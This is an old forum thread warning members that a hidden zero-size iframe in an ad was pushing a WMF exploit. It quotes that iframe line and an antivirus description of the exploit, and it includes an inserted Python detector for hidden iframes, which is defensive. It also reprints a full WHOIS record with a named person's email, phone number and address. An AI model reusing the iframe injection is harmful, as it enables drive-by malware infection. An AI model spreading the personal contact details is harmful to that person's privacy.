Nov 22, 2009

Asta Worm ALERT: Exploit.Win32.WMF-PFV Trying To Infect

miCRoSCoPiC^eaRthLinG
WARNING: To all members

While browsing the forums, you might face a strange pop-up asking you to download a .wmv file. DO NOT download and/or try to play this. The pop-up looks somewhat like this (provided by Dha):
[image]

I believe this is being spread through one of the Ads displayed at Asta. Some guy has this worm embedded in his ads - that's the only logical explanation I can find. Different anti-virus might identify it with different names - but essentially, it's a variant of the following worm. Most likely it's coming from an ad of taalkzforum.com. Yes, I confirmed it by visiting their page. If you visit taalkzforum you get flooded with this pop-up. If you inspect the forum page, you'll see an iframe containing the following code:
HTML
<iframe src="http://www.taalkzforum.com/ukpn/index.html" width=0 height=0></iframe>

When the forum page loads, it calls their URL to show in that iframe and naturally their site starts sending you this worm.

QUOTE(BitDefender.Com)

Exploit.Win32.WMF-PFV
Spreading: LOW
Discovered: 2005 Dec 27
Damage: LOW
Size: 16 KB

SYMPTOMS:
Automatic worm or spyware installation, without confirmation.

TECHNICAL DESCRIPTION:
This is a WMF (Windows Meta-File) rendering exploit. The rendering bug that is exploited lies in the Windows Picture and Fax Viewer.

The WMF file could be placed on a web site that the victim visits and gets infected.

The exploit may create a shell on the victim computer, or may download and install a worm or a spyware trojan.

The exploit 'works' on Internet Explorer and some versions of Mozilla. However, some browsers may display a confirmation dialog about it.

Source: http://www.bitdefender.com/VIRUS-173651-en...32.WMF-PFV.html


For a realtime report on how this worm is spreading and how many systems it has infected, check this:
Real-time Virus Reporting - Last 24 hours

Nothing to be really scared of - as long as you do not execute/try to play that file. If you click cancel you won't be infected and can carry on browsing the forums normally.

I'm trying to get in touch with OpaQue and get this ad blocked ASAP.
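
A defensive check for the pattern described in the post above, as an added example that is not part of the original thread: it scans a page's HTML for iframes that are hidden (zero width or height, or hidden by inline CSS) and load from a different host. The page host `forum.example` and all sample markup except the taalkzforum iframe quoted in the post are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO_DIM = re.compile(r"\s*0+(\.0+)?\s*(px|%|em)?\s*", re.I)
HIDING_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(?:width|height)\s*:\s*0+(?:px)?\s*(?:;|$)", re.I)

class HiddenFrameFinder(HTMLParser):
    """Collects (line, src) for hidden iframes served from another host."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        hidden = (ZERO_DIM.fullmatch(a.get("width", "")) is not None
                  or ZERO_DIM.fullmatch(a.get("height", "")) is not None
                  or HIDING_CSS.search(a.get("style", "")) is not None)
        # Relative URLs have no hostname and count as same-site.
        if hidden and host and host != self.page_host:
            self.findings.append((self.getpos()[0], src))

def find_hidden_third_party_iframes(html, page_host):
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; only the taalkzforum iframe is taken from the post.
SAMPLE_PAGE = """<html><body>
<iframe src="/shoutbox.html" width=0 height=0></iframe>
<iframe src="http://ads.example.net/banner.html" width="468" height="60"></iframe>
<iframe src="http://www.taalkzforum.com/ukpn/index.html" width=0 height=0></iframe>
<iframe src="http://tracker.example.org/t" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src in find_hidden_third_party_iframes(SAMPLE_PAGE, "forum.example"):
        print(f"line {line}: hidden third-party iframe -> {src}")
```

A sized ad frame such as the 468x60 banner in the sample is not flagged; this catches only the hiding technique shown in the post, not a malicious ad rendered visibly.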

 

 

 



miCRoSCoPiC^eaRthLinG
Follow-up: this is the domain registration info on Taalkzforum
CODE


Registration Service Provided By: EZ Web Hosting
Contact: billingsys@ez-web-hosting.com
Visit: https://www.ez-web-hosting.com/domainrenewal.htm

Domain name: TAALKZFORUM.COM

Registrant Contact:
home
Carl Humphrey (carl_monster@yahoo.com)
+1.4028803915
Fax: +1.4028803915
2000 Broadway Ave, #404
San Francisco, CA 94115
US

Administrative Contact:
home
Carl Humphrey (carl_monster@yahoo.com)
+1.4028803915
Fax: +1.4028803915
2000 Broadway Ave, #404
San Francisco, CA 94115
US

Technical Contact:
Ez Web Hosting
Ez Web Hosting Support (support@ez-web-hosting.com)
1-877-ezwebhosting.c
Fax: none
4633 Welborn Dr.
Sherrills Ford, NC 28673
US

Status: Locked

Name Servers:
ns.ez-web-hosting.com
ns1.ez-web-hosting.com

Creation date: 06 Oct 2005 00:00:13
Expiration date: 06 Oct 2006 00:00:13


I'm contacting EZ-Webhosting.Com, with whom taalkzforum is hosted and trying to get them to intervene.

 

 

 



sid.calcutta
Thanks for your alert, m^e. Just now when I was logging in, the same dialog box appeared requesting a download, though I did not download it, for easily understandable reasons.
Regards,
Sid


dhanesh
Yep, it's all fine now... guess they took the mail you sent seriously :) Thanks

Regards
Dhanesh.


nightfox
Hmm... they seem to have the domain now pointing to this one: http://www.ronmarshall.com/ronmarsh.html

Doesn't seem to have the virus anymore...

[N]F
